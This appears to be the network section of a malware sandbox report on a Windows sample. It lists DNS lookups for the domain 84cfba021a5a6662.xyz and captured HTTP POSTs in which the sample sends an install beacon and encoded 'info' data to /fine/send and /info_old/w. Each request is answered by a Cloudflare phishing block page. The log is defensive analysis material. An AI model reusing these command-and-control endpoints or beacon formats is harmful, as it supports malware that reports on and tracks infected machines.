Jan 29, 2021 17:39:48.516184092 CET	53	50394	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:06.826400042 CET	58530	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:06.885725021 CET	53	58530	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:07.455677032 CET	53813	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:07.506537914 CET	53	53813	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:08.294910908 CET	63732	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:08.351274967 CET	53	63732	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:08.736057043 CET	57344	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:08.794970036 CET	53	57344	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:09.225752115 CET	54450	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:09.287789106 CET	53	54450	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:09.808257103 CET	59261	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:09.868410110 CET	53	59261	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:10.324461937 CET	57151	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:10.380609035 CET	53	57151	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:11.045612097 CET	59413	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:11.104239941 CET	53	59413	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:11.746665001 CET	60516	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:11.810204029 CET	53	60516	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:12.223228931 CET	51649	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:12.279397964 CET	53	51649	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 29, 2021 17:38:38.545653105 CET	192.168.2.5	8.8.8.8	0x3eda	Standard query (0)	84cfba021a5a6662.xyz	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:46.470663071 CET	192.168.2.5	8.8.8.8	0x8685	Standard query (0)	84cfba021a5a6662.xyz	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:48.390662909 CET	192.168.2.5	8.8.8.8	0x9341	Standard query (0)	84cfba021a5a6662.xyz	A (IP address)	IN (0x0001)
Jan 29, 2021 17:39:23.981044054 CET	192.168.2.5	8.8.8.8	0x34f7	Standard query (0)	84CFBA021A5A6662.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 29, 2021 17:38:38.608894110 CET	8.8.8.8	192.168.2.5	0x3eda	No error (0)	84cfba021a5a6662.xyz	104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:38.608894110 CET	8.8.8.8	192.168.2.5	0x3eda	No error (0)	84cfba021a5a6662.xyz	172.67.208.74	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:46.521174908 CET	8.8.8.8	192.168.2.5	0x8685	No error (0)	84cfba021a5a6662.xyz	104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:46.521174908 CET	8.8.8.8	192.168.2.5	0x8685	No error (0)	84cfba021a5a6662.xyz	172.67.208.74	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:48.447154045 CET	8.8.8.8	192.168.2.5	0x9341	No error (0)	84cfba021a5a6662.xyz	104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:48.447154045 CET	8.8.8.8	192.168.2.5	0x9341	No error (0)	84cfba021a5a6662.xyz	172.67.208.74	A (IP address)	IN (0x0001)
Jan 29, 2021 17:39:24.040030956 CET	8.8.8.8	192.168.2.5	0x34f7	No error (0)	84CFBA021A5A6662.xyz	104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:39:24.040030956 CET	8.8.8.8	192.168.2.5	0x34f7	No error (0)	84CFBA021A5A6662.xyz	172.67.208.74	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

84cfba021a5a6662.xyz

84cfba021a5a6662.xy

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49717	104.21.23.16	80	C:\Users\user\Desktop\N1yprTBBXs.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:38:38.678960085 CET	201	OUT	POST //fine/send HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 82 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:38.679003000 CET	201	OUT	Data Raw: 74 79 70 65 3d 69 6e 73 74 61 6c 6c 26 73 65 6c 6c 65 72 3d 75 73 65 72 30 31 26 70 72 69 63 65 3d 2d 30 2e 32 35 26 67 75 69 64 3d 35 30 31 34 46 46 42 35 37 45 36 44 45 44 41 33 26 76 65 72 3d 34 35 2e 30 2e 30 26 6f 72 69 67 69 6e 3d 65 78 65 Data Ascii: type=install&seller=user01&price=-0.25&guid=5014FFB57E6DEDA3&ver=45.0.0&origin=exe
Jan 29, 2021 17:38:38.736063004 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d7bca264b855809d8d4b05eb87c1fc9ff1611938318; expires=Sun, 28-Feb-21 16:38:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09be17b000020742ba61000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=a3UCUvsAer7TzlHI7RqZ210zp4MXD4TkVbciut%2BqSqgM88D7lkh5NCuuNNnGNouxY9fCPsAPQ84cnzGgw14sT6V%2FvdKx4QyHNVgG35%2F90O5FN99pkg%3D%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6194627bfdd62074-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
Jan 29, 2021 17:38:38.736099958 CET	204	IN	Data Raw: 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 Data Ascii: " content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/
Jan 29, 2021 17:38:38.736125946 CET	205	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to
Jan 29, 2021 17:38:38.736150026 CET	206	IN	Data Raw: 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f Data Ascii: /div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13">
Jan 29, 2021 17:38:38.736166000 CET	207	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 29, 2021 17:38:38.746789932 CET	207	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:38.746871948 CET	207	OUT	Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 61 74 57 64 54 75 4b 73 32 33 32 69 49 42 48 71 50 7a 77 53 43 59 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVatWdTuKs232iIBHqPzwSCY~
Jan 29, 2021 17:38:38.798671007 CET	209	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d7bca264b855809d8d4b05eb87c1fc9ff1611938318; expires=Sun, 28-Feb-21 16:38:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09be1c00000207450ae9000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QwgipNFngtvthWM4vzg5cnnB4phOPVB1H1nJ94d5%2FtLdtPbaa%2BQE7%2BXe%2BYnHqam2aS14GO%2BggKTpIC%2Ff7GX7uk9mowxUSpRH0PBwPJ3%2BX%2BHEB6IJPA%3D%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6194627c6ede2074-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name
Jan 29, 2021 17:38:38.798837900 CET	210	IN	Data Raw: 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 Data Ascii: ="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-cs
Jan 29, 2021 17:38:38.798856020 CET	212	IN	Data Raw: 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 Data Ascii: umns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pre
Jan 29, 2021 17:38:38.798871040 CET	213	IN	Data Raw: 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="tex
Jan 29, 2021 17:38:38.798882008 CET	213	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 29, 2021 17:38:38.929573059 CET	213	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:38.929651022 CET	214	OUT	Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 66 78 4e 35 6f 4e 75 36 76 6c 79 6e 59 4c 33 50 36 4d 6f 6b 5f 77 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVfxN5oNu6vlynYL3P6Mok_w~
Jan 29, 2021 17:38:38.990947008 CET	215	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d7bca264b855809d8d4b05eb87c1fc9ff1611938318; expires=Sun, 28-Feb-21 16:38:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09be27c00002074ed374000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=P8QyBKprq2Hhaamq%2BMcuho9cb135xpo%2BSZUjTzq%2F%2FDTBAYHPz9WKa43m0lSZZP4TsqaIIuYbjMSN5kJmH%2FyM4akUqL0NiC1MuYLr%2BxDyR412x2QkFQ%3D%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6194627d8a242074-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="vi
Jan 29, 2021 17:38:38.990974903 CET	216	IN	Data Raw: 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d Data Ascii: ewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' h
Jan 29, 2021 17:38:38.991370916 CET	218	IN	Data Raw: 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 Data Ascii: two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretend
Jan 29, 2021 17:38:42.105988979 CET	251	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:42.106060028 CET	252	OUT	Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 61 54 4d 71 79 52 4d 68 73 6f 6e 31 65 67 6a 71 6c 6f 6c 4a 54 6b 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVaTMqyRMhson1egjqlolJTk~
Jan 29, 2021 17:38:42.157530069 CET	253	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dafc2269efb29a3d032863a3cf4025f661611938322; expires=Sun, 28-Feb-21 16:38:42 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09beede0000207413915000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LgciL5091s7SgIANBDdXrT5hElDO3RYRQ8s%2F1XbWIWN%2BGoj8y34Mb9NMoV2Wm105WERrjf22gNgxarQqxw%2BdkZuNj2d1pZIgsL0RpJ6OryQrhHRwrQ%3D%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 619462916ad42074-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 